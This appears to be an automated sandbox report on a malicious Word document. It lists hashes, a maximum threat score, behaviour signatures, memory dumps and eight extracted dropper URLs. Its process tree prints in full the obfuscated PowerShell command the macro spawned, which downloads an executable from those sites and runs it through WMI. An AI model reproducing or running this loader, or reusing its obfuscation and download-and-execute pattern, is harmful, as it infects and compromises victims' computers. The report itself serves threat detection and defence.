Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 19:19

General

  • Target

    d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc

  • Size

    239KB

  • MD5

    50bdb4343c0816c1908b32ff2ba9cea3

  • SHA1

    4ab1840794b41baf7c344663dc4013e45a3bc0ae

  • SHA256

    d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18

  • SHA512

    26f6db8694329f87e458da7fefef5e1a468f2b57aa1574e414ba20edb12c3c899f4cad69d17dec7752ff54880126ff69c3eba5491cae19d550887d373e2f1052

  • SSDEEP

    3072:Di8rNzbWOlrV1c231w8N6eXENf7KnEhJivKie6B/w2yiWydwJt3MP0iIepuxQt/:UJiP/w2P83NikmV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tuankhoi.com/wp-content/CI2oG/

exe.dropper

https://www.microsystem.fr/newsletters/uITRJ/

exe.dropper

https://natfast.com/wp-content/geeVh/

exe.dropper

https://blog.smyrnaweb.com/cgi-bin/Kzd0vdC/

exe.dropper

https://mhkhardware.com/cgi-bin/Mrn/

exe.dropper

https://ostemeda.lt/wp-content/S/

exe.dropper

https://blog.techforing.com/wp-includes/3XgEg7/

exe.dropper

https://techzslack.com/wp-includes/gSXf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:304
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1560
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD     $ L E 5 b 0 o   =     [ t y P E ] ( " { 5 } { 1 } { 3 } { 0 } { 2 } { 4 } " - F   ' M . ' , ' y s T ' , ' i o . d i R e C T O ' , ' e ' , ' R y ' , ' S ' )     ; s e T   e h o   (     [ T y P E ] ( " { 7 } { 5 } { 4 } { 6 } { 1 } { 8 } { 2 } { 3 } { 0 } "   - F ' A g E R ' , ' S E R v ' , ' C e P O I N T ' , ' m A N ' , ' . N E ' , ' t e M ' , ' t . ' , ' s y S ' , ' i ' )   ) ;     $ M 7 i v 6 i 2 = ( ( ' V t v ' + ' 2 ' ) + ( ' h ' + ' p r ' ) ) ; $ Z 1 v b t n y = $ D n k 2 2 c s   +   [ c h a r ] ( 6 4 )   +   $ F 4 s c t i 2 ; $ F q u y f d x = ( ( ' Y 4 ' + ' z ' ) + ( ' n r ' + ' c q ' ) ) ;     $ L E 5 B 0 o : : " C ` R E A t ` E D i ` R e c t o R Y " ( $ H O M E   +   ( ( ' { ' + ' 0 } ' + ( ' G z c s 8 ' + ' b ' ) + ' 5 { 0 } E e m ' + ' p w r r { 0 } ' )   - f   [ c h A R ] 9 2 ) ) ; $ Q 9 l i h 2 p = ( ' J ' + ' 5 ' + ( ' n c ' + ' 1 y 2 ' ) ) ;   $ e h O : : " s e C ` U R i T y ` P R o t o ` C ` o L "   =   ( ( ' T ' + ' l s ' ) + ' 1 2 ' ) ; $ U d s 2 6 5 k = ( ' T ' + ' i ' + ( ' 4 0 o f ' + ' 9 ' ) ) ; $ U 4 7 u p 4 v   =   ( ' J ' + ( ' 3 p ' + ' w 9 s ' ) ) ; $ M b e k l 1 v = ( ( ' G b ' + ' d ' ) + ' u o ' + ' v z ' ) ; $ V x k s 0 0 q = ( ' F ' + ' 7 ' + ( ' j ' + ' z 9 j f ' ) ) ; $ C s 7 u q 4 r = $ H O M E + ( ( ' 1 6 ' + ( ' V G z ' + ' c ' ) + ( ' s 8 ' + ' b 5 1 ' ) + ( ' 6 V E e m ' + ' p ' ) + ( ' w r r ' + ' 1 6 V ' ) ) - c R E P l A c e     ( [ C h A r ] 4 9 + [ C h A r ] 5 4 + [ C h A r ] 8 6 ) , [ C h A r ] 9 2 ) + $ U 4 7 u p 4 v + ( ' . ' + ( ' e ' + ' x e ' ) ) ; $ H 4 a 1 2 t 0 = ( ( ' E 7 ' + ' t 8 ' ) + ' l ' + ' v u ' ) ; $ U g w g _ 3 v = . ( ' n e w ' + ' - o b j e ' + ' c t ' )   N E t . W E B c l I E n T ; $ L x d e h r a = ( ( ( ( ' h t t p : ] [   1 ) ' + '   j j k g S   [ ' + ' ] ' + '   ' ) ) + ( ( ' [ ] w ] [   1 ) ' + '   j j k g S   [ ]   [ ] w t u a n k ' + ' h o i . c o m ] [   1 )   ' + ' j j ' + ' k g S ' + '   [ ]   [ ] w w p ' + ' - c o n t e n ' + ' t ] ' + ' [   ' + ' 1 ' + ' )   j j ' + ' k g ' + ' S ' + '   [ ] ' + '   ' + ' [ ] w C I ' + ' 2 ' + ' o G ' + ' ] [   1 )   j ' + ' j k g S ' + '   [ ] ' + '   [ ] w @ h t t p ' + ' s : ] ' + ' [   1 ' + ' )   j j ' + ' k g ' + ' S   [ ]   [ ] ' + ' w ] ' + ' [   1 )   j j k g S ' + '   ' ) ) + ( ( ' [ ]   ' + ' [ ] w w w w . m i ' + ' c r o s ' + ' y ' + ' s t e ' + ' m . f ' + ' r ] [   ' + ' 1 )   j j ' + ' k g S   [ ]   [ ] w n e w s l e t t e r s ] ' + ' [   1 )   ' + ' j j k g ' + ' S   [ ] ' + '   ' + ' [ ] ' + ' w u ' + ' I ' + ' T ' + ' R J ' + ' ] [ ' + '   1 ' + ' )   j j ' ) ) + ( ( ' k g S   ' + ' [ ]   [ ] w @ h t t p s : ' + ' ] [ ' + '   1 )   j j k g S   [ ]   [ ] w ] [   1 )   j j ' + ' k g S ' + '   [ ]   [ ' + ' ] ' + ' w n ' + ' a ' ) ) + ( ( ' t f ' + ' a s t . c o m ' + ' ] [   1 ' + ' )   j j k g S ' + '   [ ] ' + '   [ ' + ' ] w ' + ' w p - ' + ' c ' + ' o n t e ' + ' n t ] [   1 )   ' + ' j ' + ' j ' + ' k ' ) ) + ( ( ' g S   ' + ' [ ] ' + '   ' + ' [ ' + ' ] ' + ' w g e ' + ' e V h ] ' + ' [   1 )   ' + ' j j k ' + ' g S   [ ]   [ ] w @ h t ' + ' t p s ' + ' : ] [   1 ' + ' )   j j k ' + ' g S ' + '   ' + ' [ ]   [ ] ' + ' w ] ' ) ) + ( ( ' [   ' + ' 1 )   ' + ' j j k g S ' + '   [ ]   [ ] w b l o ' + ' g . ' + ' s m y r ' + ' n a w e b ' ) ) + ( ( ' . c ' + ' o m ' + ' ] [   1 )   j j k g S   ' + ' [ ]   [ ] ' + ' w ' + ' c g i - ' + ' b i n ' + ' ] ' + ' [   1 ' + ' )   j j ' + ' k ' + ' g S ' + '   [ ' + ' ]   ' + ' [ ' + ' ] w K z ' + ' d 0 ' + ' v d C ] ' + ' [ ' + '   1 ) ' + '   j j k g S ' + '   [ ' + ' ]   [ ] w @ ' + ' h t t p s ' + ' : ] [   1 )   j j k g S   [ ]   ' + ' [ ] w ] [ ' + '   1 )   j j k g S   ' + ' [ ' + ' ]   [ ] w m ' + ' h k ' + ' h a ' + ' r d w a r e . c o m ] [   1 ) ' + '   j j k g S   [ ] ' ) ) + ( ( '   [ ] w c g i ' + ' - b i n ] [   1 )   ' + ' j ' + ' j k g ' + ' S   [ ] ' + '   [ ' + ' ] ' + ' w M r ' + ' n ] ' ) ) + ( ( ' [   1 )   ' + ' j ' + ' j ' + ' k g S   [ ]   [ ] w @ h ' + ' t t ' ) ) + ( ( ' p ' + ' s : ' + ' ] [   1 )   j j k g S ' + '   ' + ' [ ]   [ ] w ] [   1 )   j j ' + ' k g ' + ' S ' + '   [ ]   [ ' + ' ] w o ' + ' s t e m e d a . l ' + ' t ] ' ) ) + ( ( ' [   1 )   j j k ' + ' g ' + ' S   [ ] ' + '   [ ] w w p - c ' + ' o n t ' + ' e ' ) ) + ( ( ' n t ] [   1 )   j j ' + ' k g ' + ' S ' + '   ' ) ) + ( ( ' [ ]   [ ] w S ] ' + ' [   1 ) ' + '   j j k ' + ' g S   ' + ' [ ' + ' ]   [ ' + ' ] w @ h t t p s : ] ' + ' [   1 )   j j k g S ' + '   [ ] ' + '   [ ] w ] [   ' + ' 1 )   j j k g S   ' + ' [ ]   [ ] w b l ' + ' o g ' + ' . t e c h f o r i n g . ' + ' c ' + ' o m ' + ' ] [   ' + ' 1 ' + ' )   j j k g S ' + '   [ ]   [ ' ) ) + ( ( ' ] ' + ' w w p - i ' + ' n c l u ' + ' d e s ] [   ' + ' 1 )   j j k g S   [ ]   [ ] ' + ' w 3 X g E g 7 ] [ ' + '   1 )   j j ' + ' k g S ' + '   [ ]   ' + ' [ ] ' + ' w @ ' + ' h t t p s : ' + ' ] [   1 )   j j k g S   [ ' + ' ]   [ ] w ] [   1 )   j ' + ' j k g S ' + '   [ ' ) ) + ( ' ]   [ ] ' + ' w t e c h ' + ' z s l a ' + ' c ' ) + ( ' k . c o ' + ' m ' ) + ( ( ' ] [   1 )   j j k g ' + ' S ' + '   [ ]   [ ] ' + ' w w p - i n c l u ' + ' d e ' + ' s ' + ' ] ' ) ) + ( ( ' [   ' + ' 1 )   j j ' + ' k ' + ' g S   [ ]   [ ' ) ) + ( ( ' ] ' + ' w ' + ' g S X f ] [   1 ' + ' ) ' + '   j ' + ' j k g S   [ ' + ' ] ' ) ) + ( '   ' + ' [ ] w ' ) ) ) . " r e ` p l A C e " ( ( ( ( ' ] [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j k g ' + ' S ' ) + '   ' + ( ' [ ]   ' + ' [ ] w ' ) ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " s p l ` i T " ( $ R 7 v 0 y a l   +   $ Z 1 v b t n y   +   $ P d c q r 7 o ) ; $ X q j w u 0 f = ( ( ' R _ m ' + ' c ' ) + ( ' q u ' + ' 2 ' ) ) ; f o r e a c h   ( $ Y c k z v l 8   i n   $ L x d e h r a ) { t r y { $ U g w g _ 3 v . " D O ` W N ` l o A d f i l E " ( $ Y c k z v l 8 ,   $ C s 7 u q 4 r ) ; $ I 1 a c y h _ = ( ( ' M s ' + ' f x ' ) + ( ' r ' + ' t 5 ' ) ) ; I f   ( ( . ( ' G e t - ' + ' I ' + ' t e m ' )   $ C s 7 u q 4 r ) . " L e ` N G ` T h "   - g e   3 5 4 2 9 )   { ( [ w m i c l a s s ] ( ( ' w i n 3 ' + ' 2 _ ' ) + ( ' P r o c ' + ' e ' ) + ' s s ' ) ) . " C R ` E ` A T E " ( $ C s 7 u q 4 r ) ; $ N a 6 m 0 _ 1 = ( ( ' H j y ' + ' y ' ) + ' i ' + ' d b ' ) ; b r e a k ; $ L d 2 7 m m z = ( ' Y e ' + ' c 5 ' + ( ' s 5 ' + ' g ' ) ) } } c a t c h { } } $ B v 9 t 7 k o = ( ' H ' + ( ' m o ' + ' 9 ' ) + ( ' l x ' + ' i ' ) ) 
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2820

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/304-31-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-2-0x0000000073C4D000-0x0000000073C58000-memory.dmp

      Filesize

      44KB

    • memory/304-40-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-39-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-16-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-30-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-29-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-32-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-55-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/304-6-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-0-0x000000002F8F1000-0x000000002F8F2000-memory.dmp

      Filesize

      4KB

    • memory/304-54-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-48-0x0000000073C4D000-0x0000000073C58000-memory.dmp

      Filesize

      44KB

    • memory/304-50-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

    • memory/304-53-0x00000000068D0000-0x00000000069D0000-memory.dmp

      Filesize

      1024KB

    • memory/2820-46-0x000000001B680000-0x000000001B962000-memory.dmp

      Filesize

      2.9MB

    • memory/2820-47-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB